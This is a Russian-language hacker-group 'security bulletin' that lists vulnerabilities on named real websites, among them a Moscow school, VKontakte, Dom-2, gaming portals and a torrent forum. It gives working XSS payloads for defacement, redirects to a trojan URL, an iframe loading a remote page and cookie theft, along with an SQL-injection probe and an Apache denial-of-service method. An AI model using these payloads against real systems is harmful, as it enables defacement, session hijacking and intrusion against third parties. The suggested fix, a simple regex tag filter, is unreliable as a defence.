﻿
	s e c u r i t y  b u l l e t i n

				:: by Outlaw


Bugtraq от команды 22H Team, все уязвимости найденые командой предостовляются только исключительно для ознакомления. Нужно понимать что мы не боги и найденые уязвимости на больших ресурсах могут быть найдены до нас, но уверяю что копали сайты мы сами, так что извините если бажные ресурсы будут совпадать.

________________________________________
Сайт: www.aas.ru
Уязвимость: XSS ( Межсайтовый скриптинг )

И так наш список открывает сайт Англо-Амереканской школы которая находится в Москве. В форме поиска которая находится по адресу http://www.aas.ru/search.cfm уязвима переменная "search" которая вообще не фильтруется на опастные теги да и вообще на все теги, но для этого придется скачать исходный код страницы и модефицировать ее, а именно убрать параметр CSS стиля " id="search" " для того что бы небыло ограничено символов ввода, и в поле " асtion " указать путь к поисковому скрипту, после чего любой код который вы введете будет работать. Можно для удобства создать" <textarea rows="10" cols="45" name="search">Скрипт</textarea> " в место " <input type="text" name="search"> ".

Пример атаки:
Вставить в модефицированную форму запросы:

<script>document.writeln('<h1>Hacked by Outlaw</h1><p><b>Big Truble</b>');</script>
<script>document.location.replace("урл к трояну");</script>

Решения от данной проблемы:
Для того что бы не было таких проблем у вашего сайта достаточно просто переменной 
которая хранит все передаваемые символы отсеить все теги, вот таким вот кодом:

<?php

$_POST['search']  = ereg_replace("<[a-zA-Z]{1,}>", "", $_POST['search']); #Все теги для данной переменной не доступны, вставьте этот код в вашу страницу

?>
________________________________________
Сайт: www.vkontakte.ru
Уязвимость: XSS ( Межсайтовый скриптинг )

В форме "Фильтрации Друзей" на вкладке друзья, данная функция уязвима из-за недостаточности фильтрации входных параметров на вредоностные теги, благодоря ей можно выполнить загрузку фрейма с вредостным кодом, фейком страницы или трояном, решать вам. Тег iframe не единственный тег который может быть использован :)

Пример атаки:

<iframe src="http://22h.vrlife.ru/encode.php" width="900" height="800" align="center">  #Результат на рисунке "vkontakte.jpg"

Решения от данной проблемы:
Сделать фильтрацию всех тегов и запретить их, как это сделать смотри выше.
________________________________________
Сайт: www.dom2.ru и www.old.dom2.ru
Уязвимость: XSS ( Межсайтовый скриптинг )

Я не мог просто не написать об этой уязвимости, все потому что сайт теле-проекта "Дом - 2" имеет новую версию движка, а старая также осталась по адресу "www.old.dom2.ru" и вот на старой есть данная уязвимость, но я бы не написал бы о данной ошибке если бы она не работала на новой версии сайта, уязвимость так же распространяется на новый сайт. Из-за отсутствия фильтрации параметров "Облаков Тегов" переменной " keyword " которая находится по адресу " http://old.dom2.ru/pulse/photogallery/?keyword " можно выполнить вредоностный java-код а так же доступны все теги для выполнения кода, а так же перехват сесси можно сделать и на новом сайте, главное указать ссылку на уязвимость.

Пример атаки:

http://old.dom2.ru/pulse/photogallery/?keyword=<script>alert(document.cookie)</script> #Кукисы
http://old.dom2.ru/pulse/photogallery/?keyword=<h1><b>Sucks, sucks</b><p><u>BlaBlaBla</u><p><h1>XSS It`s Works'</h1> #Это так просто пример работы тегов

Решения от данной проблемы:
Сделать фильтрацию всех тегов и запретить их, как это сделать смотри выше.
________________________________________
Сайт: www.carnage.ru и www.gameguru.ru
Уязвимость: Переполнение буфера (Apache)

На ресурсе On-line игры " Carnage " и на популярном портале об играх " GameGuru " была обнаружена версия сервера Apache Software Foundation  что бы понять в чем уязвимость, установите данную версию сервера себе на компьютер. Уязвимость веб сервере позволяет хакеру послать GET запрос с огромным количеством слешей " / " после этого сервер будет потреблять 100% ресурсов системы. Так же доступен анонимный вход на FTP, но нечего интересного там нет.

Ссылки на описание данной уязвимости: http://www.securityfocus.com/bid/2216

Решение от данной проблемы:
Обновить программное обеспечение.
________________________________________
Сайт: http://torrents-planet.ru/forum/
Уязвимость: Sql - Injection

Из-за недостаточной фильтрации входных данных переменной "t" в сценарии "viewtopic.php" на даном ресурсе есть уязвимость SQL.

Пример атаки:
http://torrents-planet.ru/forum/viewtopic.php?t=3692' результат смотрите на рисунке "planet.jpg"

Решение от данной проблемы: 
Запретить опастные символы в переменной "t" с помощью регулярного выражения.
